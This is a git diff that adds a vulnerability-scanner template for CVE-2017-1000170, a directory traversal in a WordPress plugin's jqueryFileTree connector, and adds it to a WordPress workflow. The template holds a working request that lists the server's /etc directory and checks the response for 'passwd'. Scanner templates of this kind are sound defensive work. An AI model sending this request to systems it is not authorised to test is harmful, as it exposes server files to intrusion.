diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml new file mode 100644 index 0000000000..cb3e001dd0 --- /dev/null +++ b/cves/2017/CVE-2017-1000170.yaml @@ -0,0 +1,26 @@ +id: CVE-2017-1000170 + +info: + name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/49693 + description: jqueryFileTree 2.1.5 and older Directory Traversal + tags: cve,cve2017,wordpress,wp-plugin,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + - "passwd
  • " + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 4249d902c9..e6aa4f7d72 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -11,6 +11,7 @@ workflows: matchers: - name: wordpress subtemplates: + - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml